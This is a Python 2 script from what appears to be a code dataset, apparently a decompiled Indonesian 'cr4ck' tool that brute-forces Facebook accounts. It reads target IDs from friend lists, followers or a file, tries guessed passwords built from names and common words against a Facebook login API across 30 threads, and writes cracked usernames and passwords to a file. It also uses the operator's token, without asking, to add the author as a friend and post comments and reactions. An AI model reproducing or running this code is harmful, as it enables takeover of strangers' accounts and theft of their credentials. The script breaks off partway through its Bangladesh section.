source stringlengths 3 86 | python stringlengths 75 1.04M |
|---|---|
.clean_dec.py | #!/usr/bin/python2
# coding=utf-8
import os,sys,time,mechanize,itertools,datetime,random,hashlib,re,threading,json,getpass,urllib,cookielib
from multiprocessing.pool import ThreadPool
#### WARNA RANDOM ####
P = '\033[1;97m' # putih
M = '\033[1;91m' # merah
H = '\033[1;92m' # hijau
K = '\033[1;93m' # kuning
B = '\033[1;94m' # biru
U = '\033[1;95m' # ungu
O = '\033[1;96m' # biru muda
my_color = [P, M, H, K, B, U, O]
warna = random.choice(my_color)
warni = random.choice(my_color)
try:
import mechanize
except ImportError:
os.system("pip2 install mechanize")
try:
import requests
except ImportError:
os.system("pip2 install requests")
os.system("python2 cr4ck.py")
from requests.exceptions import ConnectionError
from mechanize import Browser
from datetime import datetime
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(),max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
os.system("clear")
done = False
def animate():
for c in itertools.cycle(['\033[1;96m|', '\033[1;92m/', '\033[1;95m-', '\033[1;91m\\']):
if done:
break
sys.stdout.write('\r\033[1;93mLoading ' + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c + c )
sys.stdout.flush()
time.sleep(0.1)
t = threading.Thread(target=animate)
t.start()
time.sleep(5)
done = True
def keluar():
print "\033[1;97m{\033[1;91m!\033[1;97m} Keluar"
os.sys.exit()
def acak(x):
w = 'mhkbpcP'
d = ''
for i in x:
d += '!'+w[random.randint(0,len(w)-1)]+i
return cetak(d)
def cetak(x):
w = 'mhkbpcP'
for i in w:
j = w.index(i)
x= x.replace('!%s'%i,'%s;'%str(31+j))
x += ''
x = x.replace('!0','')
sys.stdout.write(x+'\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.03)
#########LOGO#########
logo = """ \033[1;91m$$$$$$\ $$\ $$\ $$\
$$ __$$\ $$ | $$ | $$ |
$$ / \__| $$$$$$\ $$ | $$ | $$$$$$$\ $$ | $$\
$$ | $$ __$$\ $$$$$$$$ |$$ _____|$$ | $$ |
\033[1;97m$$ | $$ | \__|\_____$$ |$$ / $$$$$$ /
$$ | $$\ $$ | $$ |$$ | $$ _$$<
\$$$$$$ |$$ | $$ |\$$$$$$$\ $$ | \$$\
\______/ \__| \__| \_______|\__| \__|
\033[1;94m──────────────────────────────────────────────────
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mAuthor \033[1;91m: \033[1;96mMuhammad Rizky
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mGithub \033[1;91m: \033[1;96mGithub.com/RIZKY4/cr4ck
\033[1;95m{\033[1;96m×\033[1;95m} \033[1;93mFacebook \033[1;91m: \033[1;96mFacebook.com/Rizky.Rasata"""
back = 0
threads = []
berhasil = []
cekpoint = []
oks = []
oke = []
id = []
###### MASUK ######
def masuk():
os.system('clear')
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;92m01\033[1;97m} Login Via Token Facebook"
print "\033[1;97m{\033[1;92m02\033[1;97m} Ambil Token Download Token App"
print "\033[1;97m{\033[1;92m03\033[1;97m} Ambil Token Dari Link"
print "\033[1;97m{\033[1;91m00\033[1;97m} Keluar"
print 50* "\033[1;94m─"
pilih_masuk()
def pilih_masuk():
msuk = raw_input("\033[1;90m︻デ═一▸ \033[91m:\033[1;92m ")
if msuk =="":
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
elif msuk =="1" or msuk =="01":
tokenz()
elif msuk =="2"or msuk =="02":
ambil_token()
elif msuk =="3"or msuk =="03":
ambil_link()
elif msuk =="0" or msuk =="00":
keluar()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m] Isi Yg Benar !"
pilih_masuk()
#####LOGIN_TOKENZ#####
def tokenz():
os.system('clear')
print logo
print 50* "\033[1;94m─"
toket = raw_input("\033[1;97m{\033[1;95m?\033[1;97m} Token \033[1;91m:\033[1;92m ")
try:
otw = requests.get('https://graph.facebook.com/me?access_token='+toket)
a = json.loads(otw.text)
zedd = open("login.txt", 'w')
zedd.write(toket)
zedd.close()
print '\033[1;97m{\033[1;92m✓\033[1;97m}\033[1;92m Login Berhasil'
os.system('xdg-open https://m.facebook.com/Rizky.Rasata')
bot_komen()
except KeyError:
print "\033[1;97m{\033[1;91m!\033[1;97m} \033[1;91mToken salah !"
time.sleep(1.7)
masuk()
######AMBIL_TOKEN######
def ambil_token():
os.system("clear")
print logo
print 50* "\033[1;94m─"
jalan(" \033[1;92mAnda Akan Di Arahkan Ke Browser ...")
os.system('xdg-open https://drive.google.com/file/d/1eAuQG4aFIH49r0ACpoUWspnSG2VUl4Ci/view?usp=drivesdk')
time.sleep(2)
masuk()
##### AMBIL LINK #####
def ambil_link():
os.system("clear")
print logo
print 50* "\033[1;94m─"
jalan("\033[1;92mDilarang Menggunakan Akun Facebook Lama...")
jalan("\033[1;92mWajib Menggunakan Akun Facebook Baru ...")
jalan("\033[1;92mJika Ingin Menggunakan Akun Facebook Lama...")
jalan("\033[1;92mWajib Menggunakan Aplikasi Yg Di Sediakan...")
os.system ("cd ... && npm install")
jalan ("\033[1;96mMulai...")
os.system ("cd ... && npm start")
raw_input("\n[ Kembali ]")
masuk()
###### BOT KOMEN #######
def bot_komen():
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m[!] Token invalid"
os.system('rm -rf login.txt')
una = ('100013185071041')
kom = ('Gw Pake Sc Lu Bang 😘')
reac = ('ANGRY')
post = ('937777953338365')
post2 = ('938954086554085')
kom2 = ('Mantap Bang 😁')
reac2 = ('LOVE')
requests.post('https://graph.facebook.com/me/friends?method=post&uids=' +una+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/comments/?message=' +kom+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post+'/reactions?type=' +reac+ '&access_token='+ toket)
requests.post('https://graph.facebook.com/'+post2+'/comments/?message=' +kom2+ '&access_token=' + toket)
requests.post('https://graph.facebook.com/'+post2+'/reactions?type=' +reac2+ '&access_token='+ toket)
menu()
###### MENU #######
def menu():
os.system('clear')
try:
toket = open('login.txt','r').read()
except IOError:
print "{!} Token Invalid !"
os.system('clear')
os.system('rm -rf login.txt')
masuk()
try:
otw = requests.get('https://graph.facebook.com/me/?access_token='+toket)
a = json.loads(otw.text)
nama = a['name']
id = a['id']
except KeyError:
os.system('clear')
print"\033[1;96m[!] \033[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
masuk()
time.sleep(1)
masuk()
except requests.exceptions.ConnectionError:
print"{!} Tidak ada koneksi"
keluar()
os.system("clear")
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;96m•\033[1;97m}\033[1;95m NAMA\033[1;90m =>\033[1;92m " +nama
print "\033[1;97m{\033[1;96m•\033[1;97m}\033[1;95m USER ID\033[1;90m =>\033[1;92m " + id
print 50* "\033[1;94m─"
print "\033[1;97m{"+warni+"01\033[1;97m}"+warna+" Crack ID Dari Teman/Publik"
print "\033[1;97m{"+warni+"02\033[1;97m}"+warna+" Crack ID Dari Postingan Grup/Teman"
print "\033[1;97m{"+warni+"03\033[1;97m}"+warna+" Crack ID Dari Total Followers"
print "\033[1;97m{"+warni+"04\033[1;97m}"+warna+" Cari ID Menggunakan Username"
print "\033[1;97m{"+warni+"05\033[1;97m}"+warna+" Perbarui Script"
print "\033[1;97m{\033[1;91m00\033[1;97m}"+warna+" Keluar"
print 50* "\033[1;94m─"
pilih()
######PILIH######
def pilih():
unikers = raw_input("\033[1;92m︻デ═一▸ \033[91m:\033[1;92m ")
if unikers =="":
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih()
elif unikers =="1" or unikers =="01":
crack_teman()
elif unikers =="2" or unikers =="02":
crack_likes()
elif unikers =="3" or unikers =="03":
crack_follow()
elif unikers =="4" or unikers =="04":
user_id()
elif unikers =="5" or unikers =="05":
perbarui()
elif unikers =="0" or unikers =="00":
os.system('clear')
jalan('Menghapus token')
os.system('rm -rf login.txt')
keluar()
else:
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih()
##### CRACK TEMAN/PUBLIK #####
def crack_teman():
os.system("clear")
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{"+warna+"01\033[1;97m}"+warni+" Crack ID Indonesia"
print "\033[1;97m{"+warna+"02\033[1;97m}"+warni+" Crack ID Bangladesh"
print "\033[1;97m{"+warna+"03\033[1;97m}"+warni+" Crack ID Usa"
print "\033[1;97m{"+warna+"04\033[1;97m}"+warni+" Crack ID Pakistan"
print "\033[1;97m{\033[1;91m00\033[1;97m}"+warni+" Kembali"
print 50* "\033[1;94m─"
pilih_teman()
######PILIH######
def pilih_teman():
univ = raw_input(""+warna+"︻デ═一▸ \033[91m:\033[1;92m ")
if univ =="":
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_teman()
elif univ =="1" or univ =="01":
crack_indo()
elif univ =="2" or univ =="02":
crack_bangla()
elif univ =="3" or univ =="03":
crack_usa()
elif univ =="4" or univ =="04":
crack_pakis()
elif univ =="5" or univ =="05":
univ()
elif univ =="0" or univ =="00":
menu()
else:
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_teman()
##### CRACK INDONESIA #####
def crack_indo():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;96m[!] \x1b[1;91mToken invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;93m01\033[1;97m} Crack Dari Daftar Teman"
print "\033[1;97m{\033[1;93m02\033[1;97m} Crack Dari Publik/Teman"
print "\033[1;97m{\033[1;93m03\033[1;97m} Crack Dari File"
print "\033[1;97m{\033[1;91m00\033[1;97m} Kembali"
print 50* "\033[1;94m─"
pilih_indo()
#### PILIH INDONESIA ####
def pilih_indo():
teak = raw_input("\033[1;93m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m{\033[1;91m!\033[1;97m}\033[1;97m Isi Yg Benar !"
pilih_indo()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;93m●●● \033[1;97mCRACK INDONESIA \033[1;93m●●●")
print 50* "\033[1;94m─"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
for s in z['data']:
id.append(s['id'])
elif teak =="2" or teak =="02":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;93m●●● \033[1;97mCRACK INDONESIA \033[1;93m●●●")
print 50* "\033[1;94m─"
idt = raw_input("\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mID Publik/Teman \033[1;91m:\033[1;92m ")
try:
pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
sp = json.loads(pok.text)
print"\033[1;97m{\033[1;93m●\033[1;97m}\033[1;93m Nama \033[1;91m:\033[1;92m "+sp["name"]
except KeyError:
print"\033[1;97m{\033[1;91m!\033[1;97m} ID publik/teman tidak ada !"
raw_input("\n\033[1;93m{\033[1;97m<Kembali>\033[1;93m}")
crack_indo()
except requests.exceptions.ConnectionError:
print"\033[1;97m{\033[1;91m!\033[1;97m} Tidak ada koneksi !"
keluar()
r = requests.get("https://graph.facebook.com/"+idt+"/friends?access_token="+toket)
z = json.loads(r.text)
for i in z['data']:
id.append(i['id'])
elif teak =="3" or teak =="03":
os.system('clear')
print logo
try:
print 50* "\033[1;94m─"
print (" \033[1;93m●●● \033[1;97mCRACK INDONESIA \033[1;93m●●●")
print 50* "\033[1;94m─"
idlist = raw_input('\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mNama File\033[1;91m :\033[1;92m ')
for line in open(idlist,'r').readlines():
id.append(line.strip())
except KeyError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada ! '
raw_input('\n\033[1;92m[ \033[1;97mKembali \033[1;92m]')
except IOError:
print '\033[1;97m{\033[1;91m!\033[1;97m} File tidak ada !'
raw_input("\n\033[1;93m{\033[1;97m<Kembali>\033[1;93m}")
crack_indo()
elif teak =="0" or teak =="00":
menu()
else:
print"\033[1;97m[\033[1;91m!\033[1;97m]\033[1;97m Isi Yg Benar !"
pilih_indo()
print "\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mTotal ID \033[1;91m:\033[1;92m "+str(len(id))
print('\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mStop Tekan CTRL+Z')
titik = ['. ','.. ','... ']
for o in titik:
print("\r\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mCrack Berjalan "+o),;sys.stdout.flush();time.sleep(1)
print("\n\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mGunakan Mode Pesawat Jika Tidak Ada Hasil")
print ("\033[1;94m──────────────────────────────────────────────────")
##### MAIN INDONESIA #####
def main(arg):
sys.stdout.write("\r{}".format(datetime.now().strftime("\033[1;96m%H\033[1;91m:\033[1;93m%M\033[1;91m:\033[1;92m%S")));sys.stdout.flush()
global cekpoint,oks
zowe = arg
try:
os.mkdir('done')
except OSError:
pass
try:
an = requests.get('https://graph.facebook.com/'+zowe+'/?access_token='+toket)
j = json.loads(an.text)
bos1 = j['first_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos1)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos1
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos1
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos1+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos2 = j['first_name'].lower()+'1234'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos2)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos2
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos2
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos2+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos3 = j['first_name'].lower()+'12345'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos3)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos3
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos3
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos3+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos4 = ('sayang')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos4)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos4
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos4
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos4+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos5 = ('bangsat')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos5)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos5
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos5
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos5+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos6 = ('anjing')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos6)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos6
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos6
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos6+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos7 = ('kontol')
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos7)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos7
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos7
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos7+"\n")
cek.close()
cekpoint.append(zowe)
else:
bos8 = j['last_name'].lower()+'123'
data = urllib.urlopen("https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=2&email="+(zowe)+"&locale=en_US&password="+(bos8)+"&sdk=ios&generate_session_cookies=1&sig=3f555f99fb61fcd7aa0c44f58f522ef6")
ko = json.load(data)
if 'access_token' in ko:
print ("\n\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} \x1b[1;92mBERHASIL")
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;92m") + j['name']
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;92m") + zowe
print ("\x1b[1;97m{\x1b[1;92m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;92m") + bos8
oke = open("done/indo.txt", "a")
oke.write("\n{×} BERHASIL \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
oke.close()
oks.append(zowe)
else:
if 'www.facebook.com' in ko['error_msg']:
print ("\n\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} \x1b[1;93mCEKPOINT")
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Nama \x1b[1;91m > \x1b[1;93m") + j['name']
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} User \x1b[1;91m > \x1b[1;93m") + zowe
print ("\x1b[1;97m{\x1b[1;93m×\x1b[1;97m} Password \x1b[1;91m> \x1b[1;93m") + bos8
cek = open("done/indo.txt", "a")
cek.write("\n{×} CEKPOINT \n{×} Nama > " +j['name']+ "\n{×} User > " +zowe+ "\n{×} Password > " +bos8+"\n")
cek.close()
cekpoint.append(zowe)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print "\n\033[1;94m──────────────────────────────────────────────────"
print '\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mSelesai ...'
print"\033[1;97m{\033[1;93m●\033[1;97m} \033[1;93mTotal \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;97m: \033[1;92m"+str(len(oks))+"\033[1;97m/\033[1;93m"+str(len(cekpoint))
print '\033[1;97m{\033[1;93m●\033[1;97m} \033[1;92mOK\033[1;97m/\x1b[1;93mCP \033[1;93mfile tersimpan \033[1;91m: \033[1;92mdone/indo.txt'
print 50* "\033[1;94m─"
raw_input("\033[1;97m{<\033[1;93mKembali\033[1;97m>}")
os.system("python2 cr4ck.py")
##### CRACK BANGLADESH #####
def crack_bangla():
global toket
os.system('clear')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;97m{\x1b[1;91m!\x1b[1;97m} Token invalid"
os.system('rm -rf login.txt')
time.sleep(1)
keluar()
os.system('clear')
print logo
print 50* "\033[1;94m─"
print "\033[1;97m{\033[1;96m01\033[1;97m} Crack Dari Daftar Teman"
print "\033[1;97m{\033[1;96m02\033[1;97m} Crack Dari Publik/Teman"
print "\033[1;97m{\033[1;96m03\033[1;97m} Crack Dari File"
print "\033[1;97m{\033[1;91m00\033[1;97m} Kembali"
print 50* "\033[1;94m─"
pilih_bangla()
#### PILIH BANGLADESH ####
def pilih_bangla():
teak = raw_input("\033[1;96m︻デ═一▸ \033[91m:\033[1;92m ")
if teak =="":
print"\033[1;97m{\033[1;91m!\033[1;97m} Isi Yg Benar !"
pilih_bangla()
elif teak =="1" or teak =="01":
os.system('clear')
print logo
print 50* "\033[1;94m─"
print (" \033[1;96m●●● \033[1;97mCRACK BANGLADESH \033[1;96m●●●")
print 50* "\033[1;94m─"
r = requests.get("https://graph.facebook.com/me/friends?access_token="+toket)
z = json.loads(r.text)
